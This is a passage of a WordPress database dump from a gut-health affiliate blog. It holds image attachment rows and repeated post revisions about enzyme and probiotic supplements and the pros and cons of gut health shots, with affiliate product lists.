10:04:21','Why take fiber supplements and top 5 Fiber Supplements ','Fibre Supplements','Top 5 Fibre Supplements and benefits','inherit','open','closed','','pexels-nataliya-vaitkevich-7615411','','','2023-10-12 17:51:09','2023-10-12 17:51:09','',5754,'http://tummyrevolution.com/wp-content/uploads/2023/10/pexels-nataliya-vaitkevich-7615411.jpg',0,'attachment','image/jpeg',0),(5762,1,'2023-10-12 10:04:27','2023-10-12 10:04:27','','the-tonik-5Lbyao5bzbc-unsplash','','inherit','open','closed','','the-tonik-5lbyao5bzbc-unsplash','','','2023-10-12 10:04:27','2023-10-12 10:04:27','',5754,'http://tummyrevolution.com/wp-content/uploads/2023/10/the-tonik-5Lbyao5bzbc-unsplash.jpg',0,'attachment','image/jpeg',0),(5763,1,'2023-10-12 10:09:16','2023-10-12 10:09:16','\n

Enzymes and probiotics are two distinct types of supplements that play different roles in supporting digestive health, but they can complement each other in certain ways. Here are some potential benefits of combining enzymes and probiotic supplements:
(SKIP to top 5 Enzyme & Probiotic supplements HERE)

\n\n\n\n
    \n
  1. Improved Digestive Function:\n
      \n
    • Enzymes: Enzymes help break down food into smaller, more easily digestible molecules. This can aid in the digestion of carbohydrates, proteins, and fats, reducing the burden on the digestive system.
    • \n\n\n\n
    • Probiotics: Probiotics contribute to a healthy balance of gut bacteria, which is essential for efficient digestion. They can help maintain a favorable environment for enzymatic activity.
    • \n
    \n
  2. \n\n\n\n
  3. Enhanced Nutrient Absorption:\n
      \n
    • Enzymes: By breaking down food into smaller components, enzymes may enhance the absorption of nutrients in the small intestine.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome influenced by probiotics may contribute to the absorption of certain nutrients, and they may help produce some vitamins.
    • \n
    \n
  4. \n\n\n\n
  5. Support for Lactose Digestion:\n
      \n
    • Enzymes: Lactase is an enzyme that helps digest lactose, the sugar in milk. Lactase supplements can be beneficial for individuals with lactose intolerance.
    • \n\n\n\n
    • Probiotics: Some probiotic strains, like Lactobacillus acidophilus, produce lactase and may assist in the digestion of lactose.
    • \n
    \n
  6. \n\n\n\n
  7. Immune System Support:\n
      \n
    • Enzymes: Some enzymes may have immune-modulating effects, potentially supporting the immune system indirectly.
    • \n\n\n\n
    • Probiotics: Probiotics can positively influence the immune system by promoting a balanced gut microbiome, which is closely linked to immune function.
    • \n
    \n
  8. \n\n\n\n
  9. Balanced Gut Microbiome:\n
      \n
    • Enzymes: While enzymes primarily focus on breaking down food, they can indirectly contribute to a healthy gut environment by aiding in the efficient digestion and absorption of nutrients.
    • \n\n\n\n
    • Probiotics: These supplements directly introduce beneficial bacteria to the gut, helping to maintain a diverse and balanced microbiome.
    • \n
    \n
  10. \n\n\n\n
  11. Reduced Digestive Discomfort:\n
      \n
    • Enzymes: By facilitating the breakdown of food, enzymes may help reduce bloating, gas, and other discomfort associated with incomplete digestion.
    • \n\n\n\n
    • Probiotics: A balanced gut microbiome can contribute to overall gut health and may reduce symptoms of digestive discomfort.
    • \n
    \n
  12. \n
\n\n\n\n

It\'s important to note that individual responses to supplements can vary, and it\'s advisable to consult with a healthcare professional before starting any new supplementation regimen. Additionally, the specific enzymes and probiotic strains, as well as their dosage, can influence the effectiveness of the combination.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Enzyme and Probiotic Supplements 2023:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + Probiotics, 2-in-1 Advanced Formula, Supports Healthy Gut with 9 Different Probiotic Strains

\n\n\n\n\"\"\n\n\n\n

Probiotic & Prebiotic Capsules,Pre & Pro Biotics for Synbiotic Gut Health & Bloating Relief for Women & Men, Enzymes with Probiotics for Digestive Health 

\n\n\n\n\"\"\n\n\n\n

Life Extension Enhanced Super Digestive Enzymes & Probiotics -Vegetarian-Friendly Digestive Health Formula For GI Balance - Plant-Based Diet Aid - Non-GMO

\n\n\n\n\"\"\n','What are the benefits of a combined enzyme and probiotic supplement?','','inherit','closed','closed','','5754-revision-v1','','','2023-10-12 10:09:16','2023-10-12 10:09:16','',5754,'https://tummyrevolution.com/?p=5763',0,'revision','',0),(5764,1,'2023-10-12 10:25:18','0000-00-00 00:00:00','\n

Enzymes and probiotics work synergistically to enhance gut health by addressing different aspects of the digestive process. Enzymes, such as amylases, proteases, and lipases, facilitate the efficient breakdown of carbohydrates, proteins, and fats, respectively, into absorbable nutrients, reducing the workload on the digestive system and promoting optimal nutrient absorption. Simultaneously, probiotics contribute to a balanced gut microbiome by introducing beneficial bacteria, fostering a harmonious environment for enzymatic activity. These live microorganisms support overall digestive function, help maintain the integrity of the intestinal lining, and modulate the immune system. Together, enzymes and probiotics create a comprehensive approach to improving gut health, promoting effective digestion, nutrient assimilation, and a resilient microbial balance, thereby contributing to overall digestive well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Enzyme and Probiotic Supplements 2023:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + Probiotics, 2-in-1 Advanced Formula, Supports Healthy Gut with 9 Different Probiotic Strains

\n\n\n\n\"\"\n\n\n\n

Probiotic & Prebiotic Capsules,Pre & Pro Biotics for Synbiotic Gut Health & Bloating Relief for Women & Men, Enzymes with Probiotics for Digestive Health 

\n\n\n\n\"\"\n\n\n\n

Life Extension Enhanced Super Digestive Enzymes & Probiotics -Vegetarian-Friendly Digestive Health Formula For GI Balance - Plant-Based Diet Aid - Non-GMO

\n\n\n\n\"\"\n','Top 5 Enzyme and Probiotic Supplements 2023','','draft','open','open','','','','','2023-10-12 10:25:18','2023-10-12 10:25:18','',0,'https://tummyrevolution.com/?p=5764',0,'post','',0),(5765,1,'2023-10-12 10:25:16','2023-10-12 10:25:16','\n

Enzymes and probiotics work synergistically to enhance gut health by addressing different aspects of the digestive process. Enzymes, such as amylases, proteases, and lipases, facilitate the efficient breakdown of carbohydrates, proteins, and fats, respectively, into absorbable nutrients, reducing the workload on the digestive system and promoting optimal nutrient absorption. Simultaneously, probiotics contribute to a balanced gut microbiome by introducing beneficial bacteria, fostering a harmonious environment for enzymatic activity. These live microorganisms support overall digestive function, help maintain the integrity of the intestinal lining, and modulate the immune system. Together, enzymes and probiotics create a comprehensive approach to improving gut health, promoting effective digestion, nutrient assimilation, and a resilient microbial balance, thereby contributing to overall digestive well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 Enzyme and Probiotic Supplements 2023:

\n\n\n\n

Physician\'s CHOICE Digestive Enzymes - Multi Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes – Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + Probiotics, 2-in-1 Advanced Formula, Supports Healthy Gut with 9 Different Probiotic Strains

\n\n\n\n\"\"\n\n\n\n

Probiotic & Prebiotic Capsules,Pre & Pro Biotics for Synbiotic Gut Health & Bloating Relief for Women & Men, Enzymes with Probiotics for Digestive Health 

\n\n\n\n\"\"\n\n\n\n

Life Extension Enhanced Super Digestive Enzymes & Probiotics -Vegetarian-Friendly Digestive Health Formula For GI Balance - Plant-Based Diet Aid - Non-GMO

\n\n\n\n\"\"\n','Top 5 Enzyme and Probiotic Supplements 2023','','inherit','closed','closed','','5764-revision-v1','','','2023-10-12 10:25:16','2023-10-12 10:25:16','',5764,'https://tummyrevolution.com/?p=5765',0,'revision','',0),(5766,1,'2023-10-12 13:32:03','2023-10-12 13:32:03','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 13:32:03','2023-10-12 13:32:03','',5574,'https://tummyrevolution.com/?p=5766',0,'revision','',0),(5767,1,'2023-10-12 13:38:17','2023-10-12 13:38:17','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 13:38:17','2023-10-12 13:38:17','',5574,'https://tummyrevolution.com/?p=5767',0,'revision','',0),(5768,1,'2023-10-12 13:45:35','2023-10-12 13:45:35','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 13:45:35','2023-10-12 13:45:35','',5574,'https://tummyrevolution.com/?p=5768',0,'revision','',0),(5769,1,'2023-10-12 13:46:52','2023-10-12 13:46:52','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 13:46:52','2023-10-12 13:46:52','',5574,'https://tummyrevolution.com/?p=5769',0,'revision','',0),(5770,1,'2023-10-12 13:53:33','2023-10-12 13:53:33','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

Vive Organic Immunity Boost Shots

\n\n\n\n\"\"\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 13:53:33','2023-10-12 13:53:33','',5574,'https://tummyrevolution.com/?p=5770',0,'revision','',0),(5772,1,'2023-10-12 14:42:32','2023-10-12 14:42:32','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

Vive Organic Immunity Boost Shots

\n\n\n\n\"\"\n\n\n\n

+GNGR Immunity Booster Organic Ginger Shots with Turmeric - Premium Ginger Shots for All Natural Immune Support - Cold Pressed Ginger Juice with Turmeric and Cayenne Pepper

\n\n\n\n\"\"\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 14:42:32','2023-10-12 14:42:32','',5574,'https://tummyrevolution.com/?p=5772',0,'revision','',0),(5773,1,'2023-10-12 14:49:41','2023-10-12 14:49:41','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine. (Or skip to Top 5 health shots to try out 2023 HERE)

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

Top 5 heath shots to try out 2023

\n\n\n\n

The Twisted Shot, Apple Cider Vinegar Shots with Turmeric, Ginger, Cinnamon, Honey & Cayenne, 100% USDA Certified Organic, Gut Health

\n\n\n\n\"\"\n\n\n\n

TEAONIC My Gut Mojo: Digest, Detox Drinks For Better Digestion, With Cranberry, Ginger, Cinnamon

\n\n\n\n\"\"\n\n\n\n

Life Equals Organic Fiber, Probiotic, Prebiotic Digestion Superfood Shot Drink- 1/2 Day Organic Fruits and Veggies, Vegan

\n\n\n\n\"\"\n\n\n\n

Vive Organic Immunity Boost Shots

\n\n\n\n\"\"\n\n\n\n

+GNGR Immunity Booster Organic Ginger Shots with Turmeric - Premium Ginger Shots for All Natural Immune Support - Cold Pressed Ginger Juice with Turmeric and Cayenne Pepper

\n\n\n\n\"\"\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-12 14:49:41','2023-10-12 14:49:41','',5574,'https://tummyrevolution.com/?p=5773',0,'revision','',0),(5774,1,'2023-10-12 14:56:49','2023-10-12 14:56:49','The pros and cons of taking gut health shots','HEalth Shots','Top health shots','inherit','open','closed','','juice-shots2','','','2023-10-12 15:00:34','2023-10-12 15:00:34','',5574,'http://tummyrevolution.com/wp-content/uploads/2023/10/Juice-shots2.jpg',0,'attachment','image/jpeg',0),(5775,1,'2023-10-12 15:59:03','2023-10-12 15:59:03','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine. (Or skip to Top 5 health shots to try out 2023 HERE)

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n

So to summarise, gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Top 5 heath shots to try out 2023

\n\n\n\n

